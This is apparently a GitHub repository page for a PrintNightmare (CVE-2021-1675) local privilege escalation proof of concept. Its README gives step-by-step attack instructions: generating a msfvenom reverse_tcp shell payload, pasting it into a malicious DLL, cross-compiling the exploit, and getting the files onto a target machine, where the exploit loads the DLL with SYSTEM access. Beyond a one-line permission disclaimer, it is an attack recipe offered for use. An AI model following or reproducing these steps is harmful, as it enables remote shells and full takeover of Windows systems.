Skip to content

AndrewTrube/CVE-2021-1675

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

PrintNightmare Local Privilege Escalation PoC

src/nightmare.cpp: source code to exploit CVE-2021-1675 and gain system access by installing a malicious dll
src/payload-dll.cpp: source code for dll with malicious shellcode in entry function

!!Only use against servers on which you have permission to test

Summary

CVE-2021-1675 is a vulnerability in the Print Spooler Service of Microsoft Windows which allows an attacker to bypass the SeLoadDriverPrivilege check. This can be leveraged to gain privilege escalation on the target machine by installing a malicious DLL which calls shellcode or uses the Window API to establish a reverse shell connection. Versions of Windows 10/8/Server 2008/Server 2012 before June 8th, 2021 are affected.

POC

  1. Download or clone git repo
  2. Use msfvenom to generate a suitable payload in c $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. Paste the output of msfvenom into payload-dll.cpp where it says to 'change me'
  4. Compile the main executable x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. Compile the dll x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. Archive the exe and dll, then find a way to upload the archive to your target machine zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. Once the archive is on the target Windows machine, extract it
  8. Move evil.dll to c:\windows\temp\evil.dll
  9. Run the PrintNightmareLPE.exe

Notes

  • If everything is working properly the exploit should iterate through the Windows' printer drivers and print out the results
  • You can change the filepath PrintNightmareLPE.exe loads the evil.dll from inside the source code
  • currently the malicous dll just loads calc.exe as Proof-of-Concept

About

PrintNightmare Local Privilege Escalation

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages